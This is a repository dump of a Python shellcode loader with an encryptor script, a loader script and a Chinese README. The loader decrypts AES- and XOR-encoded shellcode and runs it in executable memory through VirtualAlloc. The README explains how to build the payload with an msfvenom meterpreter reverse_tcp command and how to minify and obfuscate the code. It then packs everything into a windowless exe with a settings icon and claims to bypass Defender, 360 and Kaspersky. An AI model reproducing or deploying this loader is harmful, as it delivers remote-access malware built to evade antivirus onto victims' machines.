├── setting.ico ├── requirements.txt ├── jiami.py ├── main.py └── README.md /setting.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HZzz2/python-shellcode-loader/HEAD/setting.ico -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pycryptodome 2 | pyinstaller 3 | pyinstaller[encryption] 4 | python-minifier 5 | -------------------------------------------------------------------------------- /jiami.py: -------------------------------------------------------------------------------- 1 | import base64 2 | from Crypto.Cipher import AES 3 | 4 | def add_to_16(s): 5 | while len(s) % 16 != 0: 6 | s += '\0' 7 | return str.encode(s) # 返回bytes 8 | 9 | def aes_jiami(text): 10 | # 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256 11 | key = 'LeslieCheungKwok' 12 | aes = AES.new(add_to_16(key), AES.MODE_ECB) 13 | encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '') 14 | return encrypted_text 15 | 16 | def xor_jiami(s,key): 17 | xor_s = '' 18 | for i in s: 19 | xor_s += chr(ord(i) ^ key) 20 | return xor_s 21 | 22 | 23 | if __name__=='__main__': 24 | sc = 'payload' 25 | with open('./aes-xor.txt','w') as f: 26 | f.write(aes_jiami(xor_jiami(sc,35))) 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import ctypes 3 | 4 | from Crypto.Cipher import AES 5 | 6 | kernel32 = ctypes.windll.kernel32 7 | 8 | def aes_jiemi(s): 9 | cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB) 10 | return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\0').decode("utf8") 11 | 12 | def xor_jiemi(s,key): 13 | xor_s = '' 14 | for i in s: 15 | xor_s += chr(ord(i) ^ key) 16 | return xor_s 17 | 18 | def write_memory(buf): 19 | length = len(buf) 20 | 21 | kernel32.VirtualAlloc.restype = ctypes.c_void_p 22 | ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40) 23 | 24 | kernel32.RtlMoveMemory.argtypes = ( 25 | ctypes.c_void_p, 26 | ctypes.c_void_p, 27 | ctypes.c_size_t) 28 | kernel32.RtlMoveMemory(ptr, buf, length) 29 | return ptr 30 | 31 | 32 | def run(shellcode): 33 | buf = ctypes.create_string_buffer(shellcode) 34 | ptr = write_memory(buf) 35 | shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None)) 36 | shell_func() 37 | 38 | 39 | 40 | if __name__ == '__main__': 41 | jiami_sc = 'payload' 42 | sc = xor_jiemi(aes_jiemi(jiami_sc),35) 43 | shde = base64.b64decode(sc) 44 | run(shde) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # python-shellcode-loader 2 | 3 | 4 | ## 简单介绍 5 | 免杀方式 msfvenom生成raw格式的shellcode-->base64-->XOR-->AES
将python代码缩小并混淆最后生成exe
目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等 6 | 7 | ## 获取项目 8 | git clone https://github.com/HZzz2/python-shellcode-loader.git 9 | 10 | cd python-shellcode-loader 11 | 12 | pip install -r .\requirements.txt 13 | 14 | ## 生成shellcode 15 | #生成shellcode
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw` 16 | 17 | ## base64编码shellcode并替换jiami.py中的值 18 | #base64
`base64 -w 0 -i rev.raw > rev.bs64`
`cat rev.bs64`
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload' 19 | 20 | ## 加密base64并替换main.py中的值 21 | #加密base64后的shellcode
`python3 jiami.py`
#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)
复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload' 22 | 23 | ## 缩小和混淆py代码 24 | 25 | ### 缩小python代码 26 | `pyminify main.py --output main-mini.py` 27 | 28 | ### 混淆main-mini.py中的python代码 29 | [https://pyob.oxyry.com/](https://pyob.oxyry.com/) 在线混淆
![image.png](https://cdn.nlark.com/yuque/0/2022/png/26697321/1654524591386-7385c972-05e4-4761-bac3-311ae4ab2b0c.png#clientId=ufd1019e1-55bc-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=531&id=u32a8913b&margin=%5Bobject%20Object%5D&name=image.png&originHeight=664&originWidth=1919&originalType=binary&ratio=1&rotation=0&showTitle=false&size=192572&status=done&style=none&taskId=uf5d03036-4fc8-4141-aec3-77143fc268e&title=&width=1535.2)
将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py 30 | 31 | ## 打包成可执行文件exe 32 | #打包成exe
`pyinstaller.exe -Fw -i .\setting.ico --key=leslie .\main-mini-ob.py`
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥
等待打包完成。。。。
打包好后的可执行程序在dist目录中 33 | 34 | ## 流程图 35 | ![](https://cdn.nlark.com/yuque/0/2022/jpeg/26697321/1654524239719-d5ff881a-602c-4508-81b8-8e14c0d41595.jpeg) 36 | 37 | ## 检测图 38 | 39 | 40 | ### DF 41 | ![image](https://user-images.githubusercontent.com/22775890/172209887-134b5107-353b-45e2-a3b6-9e65b5189b8c.png) 42 | 43 | 44 | ### 火狐 45 | ![image](https://user-images.githubusercontent.com/22775890/172209706-1634bd75-7fe4-4844-bf95-bb8e3dea0540.png) 46 | 47 | 48 | ### 360杀毒 49 | ![image](https://user-images.githubusercontent.com/22775890/172209912-86663b43-9afe-40ec-ba1a-dd6951f04ac3.png) 50 | 51 | 52 | ### 360安全卫士云查杀 53 | ![image](https://user-images.githubusercontent.com/22775890/172209928-b96f0201-2b4d-4efb-bf4c-33df8ed3ce03.png) 54 | 55 | 56 | ### virustotal 57 | ![image](https://user-images.githubusercontent.com/22775890/172209945-6aa0f8d1-dbe2-443d-9bf1-b127fe271aa9.png) 58 | 59 | 60 | https://user-images.githubusercontent.com/22775890/172209225-080c2549-45cc-4135-a907-38738ab42df5.mp4 61 | 62 | 63 | 64 | ## 免责声明 65 | 仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | --------------------------------------------------------------------------------